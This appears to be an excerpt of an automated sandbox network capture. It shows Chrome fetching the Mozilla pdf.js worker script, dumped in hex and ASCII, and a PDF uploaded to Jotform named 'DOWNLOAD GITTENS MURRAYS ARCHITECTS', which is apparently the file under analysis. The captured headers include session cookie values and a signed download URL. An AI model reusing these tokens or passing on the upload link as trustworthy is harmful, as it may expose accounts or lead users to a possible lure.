                                                                                                                                                                                                                                            Data Ascii: /** * @licstart The following is the entire license notice for the * JavaScript code in this page * * Copyright 2022 Mozilla Foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compli
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 3d 20 27 6f 62 6a 65 63 74 27 29 0a 09 09 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 61 63 74 6f 72 79 28 29 3b 0a 09 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 0a 09 09 64 65 66 69 6e 65 28 22 70 64 66 6a 73 2d 64 69 73 74 2f 62 75 69 6c 64 2f 70 64 66 2e 77 6f 72 6b 65 72 22 2c 20 5b 5d 2c 20 66 61 63 74 6f 72 79 29 3b 0a 09 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 29 0a 09 09 65 78 70 6f 72 74 73 5b 22 70 64 66 6a 73 2d 64 69 73 74 2f 62 75 69 6c 64 2f 70 64 66 2e 77 6f 72 6b 65 72 22 5d 20 3d 20 66 61 63 74 6f 72 79 28 29 3b 0a 09 65 6c 73 65 0a 09 09 72 6f 6f 74 5b 22
                                                                                                                                                                                                                                            Data Ascii: = 'object')module.exports = factory();else if(typeof define === 'function' && define.amd)define("pdfjs-dist/build/pdf.worker", [], factory);else if(typeof exports === 'object')exports["pdfjs-dist/build/pdf.worker"] = factory();elseroot["
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 20 7c 7c 20 28 69 74 20 3d 20 5f 75 6e 73 75 70 70 6f 72 74 65 64 49 74 65 72 61 62 6c 65 54 6f 41 72 72 61 79 28 6f 29 29 20 7c 7c 20 61 6c 6c 6f 77 41 72 72 61 79 4c 69 6b 65 20 26 26 20 6f 20 26 26 20 74 79 70 65 6f 66 20 6f 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 20 69 66 20 28 69 74 29 20 6f 20 3d 20 69 74 3b 20 76 61 72 20 69 20 3d 20 30 3b 20 76 61 72 20 46 20 3d 20 66 75 6e 63 74 69 6f 6e 20 46 28 29 20 7b 7d 3b 20 72 65 74 75 72 6e 20 7b 20 73 3a 20 46 2c 20 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 6e 28 29 20 7b 20 69 66 20 28 69 20 3e 3d 20 6f 2e 6c 65 6e 67 74 68 29 20 72 65 74 75 72 6e 20 7b 20 64 6f 6e 65 3a 20 74 72 75 65 20 7d 3b 20 72 65 74 75 72 6e 20 7b 20 64 6f 6e
                                                                                                                                                                                                                                            Data Ascii: Array.isArray(o) || (it = _unsupportedIterableToArray(o)) || allowArrayLike && o && typeof o.length === "number") { if (it) o = it; var i = 0; var F = function F() {}; return { s: F, n: function n() { if (i >= o.length) return { done: true }; return { don
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 3b 20 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 5f 75 6e 73 75 70 70 6f 72 74 65 64 49 74 65 72 61 62 6c 65 54 6f 41 72 72 61 79 28 6f 2c 20 6d 69 6e 4c 65 6e 29 20 7b 20 69 66 20 28 21 6f 29 20 72 65 74 75 72 6e 3b 20 69 66 20 28 74 79 70 65 6f 66 20 6f 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 29 20 72 65 74 75 72 6e 20 5f 61 72 72 61 79 4c 69 6b 65 54 6f 41 72
                                                                                                                                                                                                                                            Data Ascii: alid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToAr
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 65 2c 20 72 65 6a 65 63 74 2c 20 5f 6e 65 78 74 2c 20 5f 74 68 72 6f 77 2c 20 6b 65 79 2c 20 61 72 67 29 20 7b 20 74 72 79 20 7b 20 76 61 72 20 69 6e 66 6f 20 3d 20 67 65 6e 5b 6b 65 79 5d 28 61 72 67 29 3b 20 76 61 72 20 76 61 6c 75 65 20 3d 20 69 6e 66 6f 2e 76 61 6c 75 65 3b 20 7d 20 63 61 74 63 68 20 28 65 72 72 6f 72 29 20 7b 20 72 65 6a 65 63 74 28 65 72 72 6f 72 29 3b 20 72 65 74 75 72 6e 3b 20 7d 20 69 66 20 28 69 6e 66 6f 2e 64 6f 6e 65 29 20 7b 20 72 65 73 6f 6c 76 65 28 76 61 6c 75 65 29 3b 20 7d 20 65 6c 73 65 20 7b 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 76 61 6c 75 65 29 2e 74 68 65 6e 28 5f 6e 65 78 74 2c 20 5f 74 68 72 6f 77 29 3b 20 7d 20 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 5f 61 73 79 6e 63 54 6f 47 65 6e 65 72 61 74 6f 72 28
                                                                                                                                                                                                                                            Data Ascii: e, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }function _asyncToGenerator(
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 72 75 63 74 6f 72 3b 20 7d 0a 0a 76 61 72 20 57 6f 72 6b 65 72 54 61 73 6b 20 3d 20 2f 2a 23 5f 5f 50 55 52 45 5f 5f 2a 2f 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 57 6f 72 6b 65 72 54 61 73 6b 28 6e 61 6d 65 29 20 7b 0a 20 20 20 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 68 69 73 2c 20 57 6f 72 6b 65 72 54 61 73 6b 29 3b 0a 0a 20 20 20 20 74 68 69 73 2e 6e 61 6d 65 20 3d 20 6e 61 6d 65 3b 0a 20 20 20 20 74 68 69 73 2e 74 65 72 6d 69 6e 61 74 65 64 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 74 68 69 73 2e 5f 63 61 70 61 62 69 6c 69 74 79 20 3d 20 28 30 2c 20 5f 75 74 69 6c 2e 63 72 65 61 74 65 50 72 6f 6d 69 73 65 43 61 70 61 62 69 6c 69 74 79 29 28 29 3b 0a 20 20 7d 0a 0a 20 20 5f 63 72 65 61 74 65 43 6c 61 73
                                                                                                                                                                                                                                            Data Ascii: ructor; }var WorkerTask = /*#__PURE__*/function () { function WorkerTask(name) { _classCallCheck(this, WorkerTask); this.name = name; this.terminated = false; this._capability = (0, _util.createPromiseCapability)(); } _createClas
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 6f 6e 66 69 67 75 72 65 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 28 30 2c 20 5f 75 74 69 6c 2e 73 65 74 56 65 72 62 6f 73 69 74 79 4c 65 76 65 6c 29 28 64 61 74 61 2e 76 65 72 62 6f 73 69 74 79 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 68 61 6e 64 6c 65 72 2e 6f 6e 28 22 47 65 74 44 6f 63 52 65 71 75 65 73 74 22 2c 20 66 75 6e 63 74 69 6f 6e 20 77 70 68 53 65 74 75 70 44 6f 63 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 57 6f 72 6b 65 72 4d 65 73 73 61 67 65 48 61 6e 64 6c 65 72 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 48 61 6e 64 6c 65 72 28 64 61 74 61 2c 20 70 6f 72 74 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 2c 20 7b 0a 20 20 20 20 6b 65 79 3a 20 22 63 72 65 61 74 65 44
                                                                                                                                                                                                                                            Data Ascii: onfigure(data) { (0, _util.setVerbosityLevel)(data.verbosity); }); handler.on("GetDocRequest", function wphSetupDoc(data) { return WorkerMessageHandler.createDocumentHandler(data, port); }); } }, { key: "createD
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 4e 6f 64 65 4a 53 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 61 72 74 69 61 6c 4d 73 67 20 2b 20 22 70 6c 65 61 73 65 20 75 73 65 20 61 20 60 6c 65 67 61 63 79 60 2d 62 75 69 6c 64 20 69 6e 73 74 65 61 64 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 61 72 74 69 61 6c 4d 73 67 20 2b 20 22 70 6c 65 61 73 65 20 75 70 64 61 74 65 20 74 6f 20 61 20 73 75 70 70 6f 72 74 65 64 20 62 72 6f 77 73 65 72 2e 22 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 49 64 20 3d 20 64 6f 63 50 61 72 61 6d 73 2e 64 6f 63 49 64 3b 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 42 61 73 65 55 72 6c 20 3d 20 64 6f 63 50 61 72 61 6d
                                                                                                                                                                                                                                            Data Ascii: NodeJS) { throw new Error(partialMsg + "please use a `legacy`-build instead."); } throw new Error(partialMsg + "please update to a supported browser."); } var docId = docParams.docId; var docBaseUrl = docParam
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 20 20 20 20 72 65 74 75 72 6e 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 63 68 65 63 6b 48 65 61 64 65 72 22 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 32 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 63 6f 6e 74 65 78 74 2e 6e 65 78 74 20 3d 20 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 70 61 72 73 65 53 74 61 72 74 58 52 65 66 22 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 34 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 63 6f 6e 74 65 78 74 2e 6e 65 78 74 20 3d 20 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: return pdfManager.ensureDoc("checkHeader"); case 2: _context.next = 4; return pdfManager.ensureDoc("parseStartXRef"); case 4: _context.next = 6;
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC1369INData Raw: 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 6e 75 6d 50 61 67 65 73 22 29 2c 20 70 64 66 4d 61 6e 61 67 65 72 2e 65 6e 73 75 72 65 44 6f 63 28 22 66 69 6e 67 65 72 70 72 69 6e 74 73 22 29 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 32 30 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 20 3d 20 5f 63 6f 6e 74 65 78 74 2e 73 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 32 20 3d 20 5f 73 6c 69 63 65 64 54 6f 41 72 72 61 79 28 5f 79 69 65 6c 64 24 50 72 6f 6d 69 73 65 24 61 6c 6c 2c 20 32 29 3b 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: Promise.all([pdfManager.ensureDoc("numPages"), pdfManager.ensureDoc("fingerprints")]); case 20: _yield$Promise$all = _context.sent; _yield$Promise$all2 = _slicedToArray(_yield$Promise$all, 2);


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            105192.168.2.1749820104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:24 UTC954OUTGET /uploads/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf HTTP/1.1
                                                                                                                                                                                                                                            Host: www.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC721INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            jf-trace-id: 20d32f22700b8249
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:36:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            location: https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=WCrTkI0L9lPxBmDI1lEqmg&expires=1736512594
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb66799ab41b5-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            106192.168.2.1749821104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:24 UTC388OUTGET /s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC462INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 2813454
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:38:09 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Tue, 03 Dec 2024 13:39:59 GMT
                                                                                                                                                                                                                                            etag: "c46d7d8f56170a6d8f5a410c401bccf5"
                                                                                                                                                                                                                                            Age: 105
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6682f7d32f4-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC907INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 73 74 61 72 74 20 54 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 73 20 74 68 65 20 65 6e 74 69 72 65 20 6c 69 63 65 6e 73 65 20 6e 6f 74 69 63 65 20 66 6f 72 20 74 68 65 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 63 6f 64 65 20 69 6e 20 74 68 69 73 20 70 61 67 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 4d 6f 7a 69 6c 6c 61 20 46 6f 75 6e 64 61 74 69 6f 6e 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69
                                                                                                                                                                                                                                            Data Ascii: /** * @licstart The following is the entire license notice for the * JavaScript code in this page * * Copyright 2022 Mozilla Foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compli
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 3d 20 27 6f 62 6a 65 63 74 27 29 0a 09 09 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 61 63 74 6f 72 79 28 29 3b 0a 09 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 64 65 66 69 6e 65 2e 61 6d 64 29 0a 09 09 64 65 66 69 6e 65 28 22 70 64 66 6a 73 2d 64 69 73 74 2f 62 75 69 6c 64 2f 70 64 66 2e 77 6f 72 6b 65 72 22 2c 20 5b 5d 2c 20 66 61 63 74 6f 72 79 29 3b 0a 09 65 6c 73 65 20 69 66 28 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 29 0a 09 09 65 78 70 6f 72 74 73 5b 22 70 64 66 6a 73 2d 64 69 73 74 2f 62 75 69 6c 64 2f 70 64 66 2e 77 6f 72 6b 65 72 22 5d 20 3d 20 66 61 63 74 6f 72 79 28 29 3b 0a 09 65 6c 73 65 0a 09 09 72 6f 6f 74 5b 22
                                                                                                                                                                                                                                            Data Ascii: = 'object')module.exports = factory();else if(typeof define === 'function' && define.amd)define("pdfjs-dist/build/pdf.worker", [], factory);else if(typeof exports === 'object')exports["pdfjs-dist/build/pdf.worker"] = factory();elseroot["
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6f 29 20 7c 7c 20 28 69 74 20 3d 20 5f 75 6e 73 75 70 70 6f 72 74 65 64 49 74 65 72 61 62 6c 65 54 6f 41 72 72 61 79 28 6f 29 29 20 7c 7c 20 61 6c 6c 6f 77 41 72 72 61 79 4c 69 6b 65 20 26 26 20 6f 20 26 26 20 74 79 70 65 6f 66 20 6f 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 22 6e 75 6d 62 65 72 22 29 20 7b 20 69 66 20 28 69 74 29 20 6f 20 3d 20 69 74 3b 20 76 61 72 20 69 20 3d 20 30 3b 20 76 61 72 20 46 20 3d 20 66 75 6e 63 74 69 6f 6e 20 46 28 29 20 7b 7d 3b 20 72 65 74 75 72 6e 20 7b 20 73 3a 20 46 2c 20 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 6e 28 29 20 7b 20 69 66 20 28 69 20 3e 3d 20 6f 2e 6c 65 6e 67 74 68 29 20 72 65 74 75 72 6e 20 7b 20 64 6f 6e 65 3a 20 74 72 75 65 20 7d 3b 20 72 65 74 75 72 6e 20 7b 20 64 6f 6e
                                                                                                                                                                                                                                            Data Ascii: Array.isArray(o) || (it = _unsupportedIterableToArray(o)) || allowArrayLike && o && typeof o.length === "number") { if (it) o = it; var i = 0; var F = function F() {}; return { s: F, n: function n() { if (i >= o.length) return { done: true }; return { don
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 3b 20 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 5f 75 6e 73 75 70 70 6f 72 74 65 64 49 74 65 72 61 62 6c 65 54 6f 41 72 72 61 79 28 6f 2c 20 6d 69 6e 4c 65 6e 29 20 7b 20 69 66 20 28 21 6f 29 20 72 65 74 75 72 6e 3b 20 69 66 20 28 74 79 70 65 6f 66 20 6f 20 3d 3d 3d 20 22 73 74 72 69 6e 67 22 29 20 72 65 74 75 72 6e 20 5f 61 72 72 61 79 4c 69 6b 65 54 6f 41 72
                                                                                                                                                                                                                                            Data Ascii: alid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToAr
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 65 2c 20 72 65 6a 65 63 74 2c 20 5f 6e 65 78 74 2c 20 5f 74 68 72 6f 77 2c 20 6b 65 79 2c 20 61 72 67 29 20 7b 20 74 72 79 20 7b 20 76 61 72 20 69 6e 66 6f 20 3d 20 67 65 6e 5b 6b 65 79 5d 28 61 72 67 29 3b 20 76 61 72 20 76 61 6c 75 65 20 3d 20 69 6e 66 6f 2e 76 61 6c 75 65 3b 20 7d 20 63 61 74 63 68 20 28 65 72 72 6f 72 29 20 7b 20 72 65 6a 65 63 74 28 65 72 72 6f 72 29 3b 20 72 65 74 75 72 6e 3b 20 7d 20 69 66 20 28 69 6e 66 6f 2e 64 6f 6e 65 29 20 7b 20 72 65 73 6f 6c 76 65 28 76 61 6c 75 65 29 3b 20 7d 20 65 6c 73 65 20 7b 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 76 61 6c 75 65 29 2e 74 68 65 6e 28 5f 6e 65 78 74 2c 20 5f 74 68 72 6f 77 29 3b 20 7d 20 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 5f 61 73 79 6e 63 54 6f 47 65 6e 65 72 61 74 6f 72 28
                                                                                                                                                                                                                                            Data Ascii: e, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }function _asyncToGenerator(
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 72 75 63 74 6f 72 3b 20 7d 0a 0a 76 61 72 20 57 6f 72 6b 65 72 54 61 73 6b 20 3d 20 2f 2a 23 5f 5f 50 55 52 45 5f 5f 2a 2f 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 57 6f 72 6b 65 72 54 61 73 6b 28 6e 61 6d 65 29 20 7b 0a 20 20 20 20 5f 63 6c 61 73 73 43 61 6c 6c 43 68 65 63 6b 28 74 68 69 73 2c 20 57 6f 72 6b 65 72 54 61 73 6b 29 3b 0a 0a 20 20 20 20 74 68 69 73 2e 6e 61 6d 65 20 3d 20 6e 61 6d 65 3b 0a 20 20 20 20 74 68 69 73 2e 74 65 72 6d 69 6e 61 74 65 64 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 74 68 69 73 2e 5f 63 61 70 61 62 69 6c 69 74 79 20 3d 20 28 30 2c 20 5f 75 74 69 6c 2e 63 72 65 61 74 65 50 72 6f 6d 69 73 65 43 61 70 61 62 69 6c 69 74 79 29 28 29 3b 0a 20 20 7d 0a 0a 20 20 5f 63 72 65 61 74 65 43 6c 61 73
                                                                                                                                                                                                                                            Data Ascii: ructor; }var WorkerTask = /*#__PURE__*/function () { function WorkerTask(name) { _classCallCheck(this, WorkerTask); this.name = name; this.terminated = false; this._capability = (0, _util.createPromiseCapability)(); } _createClas
                                                                                                                                                                                                                                            2025-01-10 12:36:25 UTC1369INData Raw: 6f 6e 66 69 67 75 72 65 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 28 30 2c 20 5f 75 74 69 6c 2e 73 65 74 56 65 72 62 6f 73 69 74 79 4c 65 76 65 6c 29 28 64 61 74 61 2e 76 65 72 62 6f 73 69 74 79 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 68 61 6e 64 6c 65 72 2e 6f 6e 28 22 47 65 74 44 6f 63 52 65 71 75 65 73 74 22 2c 20 66 75 6e 63 74 69 6f 6e 20 77 70 68 53 65 74 75 70 44 6f 63 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 57 6f 72 6b 65 72 4d 65 73 73 61 67 65 48 61 6e 64 6c 65 72 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 48 61 6e 64 6c 65 72 28 64 61 74 61 2c 20 70 6f 72 74 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 2c 20 7b 0a 20 20 20 20 6b 65 79 3a 20 22 63 72 65 61 74 65 44
                                                                                                                                                                                                                                            Data Ascii: onfigure(data) { (0, _util.setVerbosityLevel)(data.verbosity); }); handler.on("GetDocRequest", function wphSetupDoc(data) { return WorkerMessageHandler.createDocumentHandler(data, port); }); } }, { key: "createD
